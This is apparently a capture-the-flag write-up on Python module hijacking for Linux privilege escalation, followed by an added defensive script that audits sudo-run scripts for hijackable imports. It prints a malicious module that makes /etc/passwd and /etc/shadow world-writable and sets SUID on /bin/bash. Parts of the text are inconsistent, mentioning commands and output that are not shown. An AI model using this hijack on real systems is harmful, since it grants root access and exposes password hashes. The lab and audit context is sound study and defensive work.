Python-based applications escalation

If they run as root and we can write to them, we can replace them with a Python reverse shell.

Module Hijacking

This happens when a module that a script tries to import is missing, so we can supply our own version in its place.


sudo -l


wifi_reset.py was importing a module named wificontroller and executing some commands, but this wificontroller module was absent.


So we created our malicious wificontroller.py module, containing the privilege escalation code, inside the same folder, i.e. /home/walter, and executed it.

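import os

# Each function matches a name that wifi_reset.py calls on the module.

def stop(text, value):
    # Make /etc/passwd world-writable
    os.system("chmod 777 /etc/passwd")

def reset(text, value):
    # Set the SUID bit on /bin/bash
    os.system("chmod +s /bin/bash")

def start(text, value):
    # Make /etc/shadow world-writable
    os.system("chmod 777 /etc/shadow")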


As a result of executing it, we got the following results.


Bash now has the SUID bit set, so we became root with the following command and read the root flag.

See? All it does is spawn a bash shell. Now let's run our sudo command “sudo /usr/bin/python /home/walter/wifi_reset.py”.

We get root, proof.txt and this box is done.
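From the defender's side, the condition described above (a script run through sudo whose import is absent or resolves from a user-writable folder) can be audited before it is abused. The following is an added example, not part of the original notes; the function names and the trust policy (a directory is trusted only if it is root-owned and not group- or world-writable) are assumptions, and the demo layout is constructed.

```python
import ast, importlib, importlib.machinery, os, stat, sys, tempfile

def imported_modules(source):
    """Top-level names of the absolute imports in a script's source."""
    names = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return names

def untrusted_dir(path):
    """Assumed policy: untrusted if not root-owned or group/world-writable."""
    st = os.stat(path)
    return st.st_uid != 0 or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit(script_path):
    """Return (module, problem, directory) for each import that can be hijacked."""
    script_dir = os.path.dirname(os.path.abspath(script_path))
    search = [script_dir] + sys.path[1:]  # Python searches the script's folder first
    importlib.invalidate_caches()         # pick up files created since the last run
    with open(script_path) as fh:
        modules = imported_modules(fh.read())
    findings = []
    for name in sorted(modules - set(sys.builtin_module_names)):
        spec = importlib.machinery.PathFinder.find_spec(name, search)
        if spec is None:
            # Absent module: whoever can write to the script's folder can supply it.
            if untrusted_dir(script_dir):
                findings.append((name, "missing", script_dir))
        elif spec.origin and os.path.isabs(spec.origin):
            origin_dir = os.path.dirname(spec.origin)
            if untrusted_dir(origin_dir):
                findings.append((name, "loaded from untrusted dir", origin_dir))
    return findings

def demo():
    """Constructed layout mirroring the notes: the script imports an absent module."""
    with tempfile.TemporaryDirectory() as d:
        os.chmod(d, 0o777)  # stand-in for a folder an unprivileged user can write to
        script = os.path.join(d, "wifi_reset.py")
        with open(script, "w") as fh:
            fh.write("import wificontroller\nwificontroller.reset('wlan0', 1)\n")
        before = audit(script)                                   # module absent
        open(os.path.join(d, "wificontroller.py"), "w").close()  # module now present
        after = audit(script)
        return [(m, p) for m, p, _ in before], [(m, p) for m, p, _ in after]

if __name__ == "__main__":
    print(demo())
```

Any finding on a script listed in `sudo -l` means the sudoers entry should point at a root-owned copy in a root-owned directory, with its imports installed system-wide.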
